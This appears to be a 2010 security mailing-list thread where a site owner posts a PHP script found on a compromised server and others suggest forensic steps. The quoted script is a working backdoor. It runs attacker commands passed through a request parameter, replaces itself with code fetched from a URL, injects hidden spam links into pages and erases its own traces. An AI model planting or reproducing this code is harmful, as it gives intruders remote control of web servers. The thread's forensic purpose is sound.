Goggling for the IP "89.149.242.216" and "adsttnmq1" gave me this: http://www.phpfreaks.com/forums/index.php?topic=251135.msg1178041#msg1178041
Looks like the same person hit this guy. Adrian On Mon, Mar 1, 2010 at 2:32 PM, Adrian Crenshaw <[email protected]>wrote: > Thanks all. I googled for "adsttnmq1" earlier and found some stuff. Looking > though my logs, I found an IP of a host making a post to one of the URLs in > question. Still looking more into what it was doing. > > Thanks > Adrian > > > On Mon, Mar 1, 2010 at 12:12 PM, Andrew Ellis <[email protected]>wrote: > >> Historically, I've seen this stuff done through a Remote File Include, >> tho I can think of a dozen other ways to get it up on your server. I'd >> probably start by digging through the logs looking for someone >> including this file in some URL parameter. >> >> >> >> On Mon, Mar 1, 2010 at 10:31 AM, Jim Halfpenny <[email protected]> >> wrote: >> > A search for the string abcdefghiklmnjsweqrtyuiopzx shows other a forum >> > thread with some info on this file: >> > >> > http://www.webhostingtalk.com/showthread.php?t=876121 >> > >> > I'm sure there are other sources of info out there. Time for some >> forensic >> > analysis of your logs to work out how and when this got here. I'm >> guessing >> > an automated attack against a known vuln in a PHP app? >> > >> > Jim >> > >> > On 1 March 2010 09:16, Adrian Crenshaw <[email protected]> wrote: >> >> >> >> Ok, I think one of my sites may have been compromised. I found the >> >> following PHP script on a site, but I'm not sure what it is trying to >> do. >> >> Anyone else ever seen this script before? >> >> >> >> Adrian >> >> >> >> <?php >> >> ignore_user_abort(1); >> >> set_time_limit(0); >> >> >> >> function Clear() >> >> { >> >> unlink("c"); >> >> unlink("1r"); >> >> unlink("log"); >> >> } >> >> >> >> function Clear2() >> >> { >> >> $mrd = trim(file_get_contents("m")); >> >> $pt = "../$mrd"; >> >> $fin = file_get_contents($pt); >> >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >> >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >> >> $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); >> >> $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); >> >> $fin = ereg_replace("<!--dd4-->", "", $fin); >> >> $fin = ereg_replace("<!--dd5-->", "", $fin); >> >> $fin = ereg_replace("<font style=\"position: absolute;overflow: >> >> hidden;height: 0;width: 0\">", "", $fin); >> >> $fmrd = fopen($pt, "w+"); >> >> fwrite($fmrd, $fin); >> >> fclose($fmrd); >> >> echo " upt-ok"; >> >> } >> >> >> >> function GetVar($name, &$var) >> >> { >> >> $var = ""; >> >> if (isset($_POST[$name])) >> >> $var = $_POST[$name]; >> >> >> >> if (isset($_GET[$name])) >> >> $var = $_GET[$name]; >> >> >> >> if (($var) =="") >> >> return false; >> >> else return true; >> >> } >> >> >> >> function Gen() >> >> { >> >> $alp = "abcdefghiklmnjsweqrtyuiopzx"; >> >> $maps = array(); >> >> if (isset($_POST["sg"])) >> >> $sg = $_POST["sg"]; >> >> >> >> if (isset($_GET["sg"])) >> >> $sg = $_GET["sg"]; >> >> >> >> if (isset($_POST["gm"])) >> >> $g = $_POST["gm"]; >> >> >> >> if (isset($_GET["gm"])) >> >> $g = $_GET["gm"]; >> >> >> >> >> >> $path = ""; >> >> $fr = fopen("1r", "a+"); >> >> if (file_exists("c")) >> >> { >> >> $fconf = file("c"); >> >> $tname = trim($fconf[0]); >> >> $cname = trim($fconf[1]); >> >> $curs = trim($fconf[2]); >> >> $pid = trim($fconf[3]); >> >> if ($pid == 100) >> >> { >> >> $pid = 0; >> >> $rnd = mt_rand(0, 999); >> >> $nm = ""; >> >> for ($i=0; $i<3; $i++) >> >> { >> >> $ran = mt_rand(0,26); >> >> $sym = $alp[$ran]; >> >> $nm = $nm.$sym; >> >> } >> >> $cname = $nm; >> >> mkdir("$tname/$cname"); >> >> $curs = $g; >> >> } >> >> } >> >> else >> >> { >> >> $rnd = mt_rand(0, 999); >> >> $nm = ""; >> >> for ($i=0; $i<5; $i++) >> >> { >> >> $ran = mt_rand(0,26); >> >> $sym = $alp[$ran]; >> >> $nm = $nm.$sym; >> >> } >> >> $tname = $nm; >> >> $pid = 0; >> >> $curs = $g; >> >> mkdir($tname); >> >> $fht = fopen("$tname/.htaccess", "w+"); >> >> $htname = $sg."2.txt"; >> >> $fp = fopen($htname, "r"); >> >> $fin = ''; >> >> while (!feof($fp)) >> >> { >> >> $fc = fgets($fp, 1024); >> >> if (!$fc) break; >> >> $fin .= $fc; >> >> } >> >> fclose($fp); >> >> fwrite($fht, $fin); >> >> fclose($fht); >> >> $rnd = mt_rand(0, 999); >> >> $nm = ""; >> >> for ($i=0; $i<3; $i++) >> >> { >> >> $ran = mt_rand(0,26); >> >> $sym = $alp[$ran]; >> >> $nm = $nm.$sym; >> >> } >> >> $cname = $nm; >> >> mkdir("$tname/$cname"); >> >> } >> >> $gname = $sg."sgen.php"; >> >> for ($j=$pid; $j<$pid+10; $j++) >> >> { >> >> $fp = fopen($gname."?g=$curs", "r"); >> >> $fin = ''; >> >> while (!feof($fp)) >> >> { >> >> $fc = fgets($fp, 1024); >> >> if (!$fc) break; >> >> $fin .= $fc; >> >> } >> >> fclose($fp); >> >> >> >> $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); >> >> fwrite($fnd, $fin); >> >> fclose($fnd); >> >> } >> >> >> >> if ($j==100) >> >> { >> >> $fp = fopen($gname."?g=$curs&m=1", "r"); >> >> $fin = ''; >> >> while (!feof($fp)) >> >> { >> >> $fc = fgets($fp, 1024); >> >> if (!$fc) break; >> >> $fin .= $fc; >> >> } >> >> fclose($fp); >> >> $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); >> >> fwrite($fnd, $fin); >> >> fclose($fnd); >> >> $map = "$path/$tname/$cname/$curs"."_lm.htm"; >> >> fwrite($fr,"$map\n"); >> >> } >> >> >> >> $fconf = fopen("c", "w+"); >> >> fwrite($fconf, $tname."\n"); >> >> fwrite($fconf, $cname."\n"); >> >> fwrite($fconf, $curs."\n"); >> >> $nj = $j; >> >> fwrite($fconf, $nj."\n"); >> >> fclose($fconf); >> >> } >> >> >> >> function Update() >> >> { >> >> $thisname = "1.php"; >> >> if (isset($_POST['u'])) >> >> $u = $_POST['u']; >> >> >> >> if (isset($_GET['u'])) >> >> $u = $_GET['u']; >> >> >> >> $fp = fopen($u, "r"); >> >> $fin = ''; >> >> while (!feof($fp)) >> >> { >> >> $fc = fgets($fp, 1024); >> >> if (!$fc) break; >> >> $fin .= $fc; >> >> } >> >> fclose($fp); >> >> >> >> $fthis = fopen($thisname, "w+"); >> >> fwrite($fthis, $fin); >> >> fclose($fthis); >> >> } >> >> >> >> function Com() >> >> { >> >> if (isset($_POST['c'])) >> >> @system($_POST['c']); >> >> if (isset($_GET['c'])) >> >> @system($_GET['c']); >> >> } >> >> >> >> function UpKos() >> >> { >> >> $mrd = trim(file_get_contents("m")); >> >> $pt = "../$mrd"; >> >> $fin = file_get_contents($pt); >> >> $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); >> >> $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); >> >> $fmrd = fopen($pt, "w+"); >> >> fwrite($fmrd, $fin); >> >> fclose($fmrd); >> >> } >> >> >> >> >> >> function MRepl() >> >> { >> >> $mpt = ""; >> >> $drs = ""; >> >> $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: >> >> hidden;height: 0;width: 0\">"; >> >> $endtag = "</font></body></html><sdioyslkjs2> "; >> >> $mrd = trim(file_get_contents("m")); >> >> $pt = "../$mrd"; >> >> $fin = file_get_contents($pt); >> >> GetVar("mpt", $mpt); >> >> // óäàëÿåì çàâåðøàþùèå õòìë òåãè >> >> $fin = preg_replace ("/<\/body>/i", "", $fin); >> >> $fin = preg_replace ("/<\/html>/i", "", $fin); >> >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >> >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >> >> $fp = fopen($mpt, "r"); >> >> GetVar("drs", $drs); >> >> $fin = $fin.$begtag; >> >> $drs = str_replace("\\", "", $drs); >> >> $fin = $fin.$drs; >> >> $fin = $fin.$endtag; >> >> $fmrd = fopen($pt, "w+"); >> >> fwrite($fmrd, $fin); >> >> fclose($fmrd); >> >> } >> >> >> >> function Main() >> >> { >> >> if (isset($_POST['u']) || isset($_GET['u'])) >> >> { >> >> Update(); >> >> exit(); >> >> } >> >> >> >> if (isset($_POST['c']) || isset($_GET['c'])) >> >> { >> >> Com(); >> >> exit(); >> >> } >> >> >> >> if (isset($_POST['uk']) || isset($_GET['uk'])) >> >> { >> >> UpKos(); >> >> exit(); >> >> } >> >> >> >> if (isset($_POST['g']) || isset($_GET['g'])) >> >> { >> >> Gen(); >> >> exit(); >> >> } >> >> >> >> if (isset($_POST['s']) || isset($_GET['s'])) >> >> { >> >> MRepl(); >> >> exit(); >> >> } >> >> >> >> if (isset($_POST['cl']) || isset($_GET['cl'])) >> >> { >> >> Clear(); >> >> exit(); >> >> } >> >> >> >> if (isset($_POST['cl2']) || isset($_GET['cl2'])) >> >> { >> >> Clear2(); >> >> exit(); >> >> } >> >> >> >> echo "<ok>"; >> >> >> >> } >> >> >> >> Main(); >> >> >> >> ?> >> >> >> >> _______________________________________________ >> >> Pauldotcom mailing list >> >> [email protected] >> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> >> Main Web Site: http://pauldotcom.com >> > >> > >> > _______________________________________________ >> > Pauldotcom mailing list >> > [email protected] >> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> > Main Web Site: http://pauldotcom.com >> > >> >> >> >> -- >> Andrew Ellis >> http://blog.psych0tik.net >> _______________________________________________ >> Pauldotcom mailing list >> [email protected] >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com >> > >
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
